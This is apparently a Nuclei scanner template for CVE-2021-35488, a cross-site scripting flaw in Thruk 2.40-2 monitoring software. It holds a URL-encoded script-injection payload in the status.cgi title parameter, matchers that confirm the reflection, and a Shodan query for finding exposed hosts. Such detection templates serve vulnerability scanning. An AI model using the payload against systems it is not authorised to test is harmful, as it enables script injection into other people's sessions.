id: CVE-2021-35488

info:
  name: Thruk 2.40-2 - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
  reference:
    - https://www.gruppotim.it/redteam
    - https://www.thruk.org/changelog.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35488
    cwe-id: CWE-79
  metadata:
    shodan-query: http.html:"Thruk"
    verified: "true"
  tags: cve,cve2021,thruk,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'></script><script>alert(document.domain)</script>"
          - "Thruk Monitoring"
        condition: and

      - type: status
        status:
          - 401

# Enhanced by md on 2022/09/08